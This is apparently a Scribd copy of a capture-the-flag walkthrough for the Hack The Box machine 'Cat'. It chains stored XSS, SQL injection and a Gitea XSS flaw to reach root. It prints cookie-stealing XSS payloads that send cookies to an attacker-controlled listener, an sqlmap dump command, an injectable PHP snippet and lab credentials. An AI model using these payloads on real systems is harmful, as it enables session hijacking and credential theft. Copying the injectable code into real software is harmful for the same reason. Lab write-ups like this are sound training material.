100% found this document useful (1 vote)
4K views17 pages

Cat Hackthebox Writeup

The document is a writeup for the Hackthebox machine 'Cat', detailing the process of exploitation through various vulnerabilities including Stored XSS and SQL Injection. It describes how to gain access to the admin panel, retrieve credentials, and escalate privileges to obtain the root flag. The writeup includes specific commands and code snippets used during the exploitation process.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
100% found this document useful (1 vote)
4K views17 pages

Cat Hackthebox Writeup

The document is a writeup for the Hackthebox machine 'Cat', detailing the process of exploitation through various vulnerabilities including Stored XSS and SQL Injection. It describes how to gain access to the admin panel, retrieve credentials, and escalate privileges to obtain the root flag. The writeup includes specific commands and code snippets used during the exploitation process.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 17

Cat Hackthebox Writeup

HTB machine link:

https://app.hackthebox.com/machines/Cat

Recon Link to heading

Of the open ports, we have 22.80 as usual.

When accessing port 80, we are redirected to cat.htb. Let’s immediately add an entry to /etc/hosts
echo "10.10.11.53 cat.htb" | sudo tee -a /etc/hosts

On the site itself we see the registration form


Once logged in, we have access to other functions
User flag Link to heading
During the enumeration, we discover the .git directory.

Using gittools, it is possible to extract files from .git repositories. This tool checks if directory mapping is enabled, and recursively loads the contents
of .git for further analysis.
After extraction we have access to the source code of the application. Let’s try to analyze it for vulnerabilities (We can throw it into SAST)
So for example when checking join.php you may notice that user data is directly stored in the database during registration and is not filtered in any
way. Which will lead to Stored XSS
And in accept_cat.php, you can see SQL injection, which occurs due to direct user input into SQL queries.
Vulnerable part of the code:
// VULNERABLE CODE:
$cat_name = $_POST['catName'];
$sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
$pdo->exec($sql_insert);

But accept_cat.php is available only to axel admin. It turns out that we need to get into the admin area via XSS (e.g. steal cookies), and therefore use
SQLi to get creds from the database.

Let’s get started

Since we have nothing filtered, we can use the basic payload from the Portswigger Academy
<script>document.location='http://10.10.xx.xx:4444/?c='+document.cookie;</script>

And, since it’s blind XSS, you’ll need a wiretapper

python3 -m http.server 4444

After which we register with the payload as the username


Then we log in and create a random kitten so the admin can see us
After a couple of seconds we get a cookie bounce.

Now we can see the Administrator panel

Through the previously discovered SQLi, we’ll get the creds:


sqlmap -r req.txt -p catName --level 3 --risk 3 --batch --random-agent --tables --dump --dbms=sqlite --threads 10

Where req.txt is your endpoint request with admin cookies

Get password hashes


rosa:soyunaprincesarosa

Logging in via ssh

Looking through the Apache log, we can find the credentials for the user Axel. (This is nicely highlighted by linpeas.sh)
axel:aNdZwgC4****************

Log in via ssh and get the flag

Pay attention to “You have mail” when logging in

Root flag Link to heading


Let’s see what kind of e-mail we got - /var/mail/axel.

It’s probably a hint about privilege escalation, but it’s a lot to read.
So let’s do the usual. We’ll find open ports and forward the web
ssh -L 3000:127.0.0.1:3000 [email protected]

We have Gitea up on port 3000.

And there is a version that is susceptible to XSS

Apparently the author of the car likes to steal cookies.

And now we know what the letter was hinting at.


<a href="javascript:fetch('http://10.10.xx.xx:4444/?d='+encodeURIComponent(btoa(document.cookie)));">XSS test</a>

echo -e "Subject: Test Email\n\nHello, check repo http://localhost:3000/axel/l4tmur" | sendmail [email protected]

Get index.php
<a href='javascript:fetch("http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md").then(response=

Index.php source code with root creds:


<?php
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';

if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) ||
$_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {

header('WWW-Authenticate: Basic realm="Employee Management"');


header('HTTP/1.0 401 Unauthorized');
exit;
}

header('Location: dashboard.php');
exit;

You might also like